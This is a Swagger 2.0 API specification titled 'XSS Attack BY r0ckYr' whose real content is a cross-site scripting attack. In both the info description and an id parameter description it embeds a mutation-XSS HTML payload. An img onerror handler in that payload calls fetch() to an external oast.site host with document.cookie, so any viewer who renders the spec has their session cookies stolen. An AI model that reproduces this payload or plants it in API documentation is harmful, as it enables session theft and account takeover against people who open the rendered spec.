swagger: '2.0'
info:
  title: XSS Attack BY r0ckYr
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=1 onerror=fetch('https://1oxao1vo38uowjibvtohkgvgeeabwuu1y.oast.site?c='+document.cookie)></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /r0ckYr:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - r0ckYr_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=1 onerror=fetch('https://1oxao1vo38uowjibvtohkgvgeeabwuu1y.oast.site?c='+document.cookie)></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified

